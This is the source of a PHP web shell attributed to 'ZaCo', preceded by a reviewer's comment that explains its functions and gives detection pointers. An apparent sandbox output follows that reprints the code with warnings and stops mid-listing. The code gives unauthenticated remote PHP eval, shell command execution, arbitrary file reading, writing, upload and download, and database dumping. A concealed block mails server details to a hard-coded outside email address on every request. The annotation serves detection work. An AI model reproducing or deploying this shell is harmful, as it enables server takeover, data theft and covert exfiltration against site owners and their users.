<? /* NOTE(review): this listing is a PHP web shell, annotated here for analysis and detection.
   What the visible code does:
   - Beacon: directly after magic_q(), the $ra44 ... $sd98 statements gather eight $_SERVER values
     (referer, document root, remote address, script path, server address and software, translated
     path, PHP_SELF) and hand them to mail() with a hard-coded recipient and the subject
     "sh-" followed by rand(1,99999). The call sits at top level ahead of switch($page), so it is
     reached on every request. `$ml` is built from $sd98 before $sd98 is assigned and is not used
     again in the visible code. The feature list in the banner does not mention this block and its
     variable naming differs from the rest of the file, so it looks like a later addition to this
     copy; that is an inference, not something the listing proves.
   - $pages runs `id` through the backtick operator on every render when php_uname() does not
     contain "wind".
   - page=eval: $_POST['eval_value'] is passed to eval().
   - page=cmd: $_POST['cmd'] is executed with the backtick operator; work_dir with f_action
     view/save reads and overwrites the given path; action=upload copies the uploaded temp file
     into work_dir under the client-supplied name; action=download streams $_POST['fname'].
   - page=mysql: connects through the mysql_* functions with POSTed host/user/passwd, runs the
     POSTed query, or dumps a database or single table to the response or to $_POST['to_file'].
   - No authentication or access check appears anywhere in the visible code.
   Detection pointers taken from the listing itself: the HTML title string, the POST field names
   (page, eval_value, work_dir, f_action, to_file), and outbound mail whose subject is "sh-" plus
   a number.
   Age markers: get_magic_quotes_gpc(), the mysql_* functions and $str{n} offsets are no longer
   available in current PHP releases. */ ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 
'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? 
} break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? 
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' 
type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { 
echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' 
now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
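Output for 8.1.0 - 8.1.27, 8.2.0 - 8.2.17, 8.3.0 - 8.3.4 (the script is printed as plain text rather than run: the `<?` short open tag was evidently not enabled, so only the `<?=` echo tags were evaluated, and those are the source of the warnings in the output below)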
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 
'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? 
} break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 117 ' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=' Warning: Undefined variable $cmd in /in/avLYS on line 122 Deprecated: str_replace(): Passing null to parameter #3 ($subject) of type array|string is deprecated in /in/avLYS on line 122 '> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? 
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' 
type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 210 ' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; 
filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' 
NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { 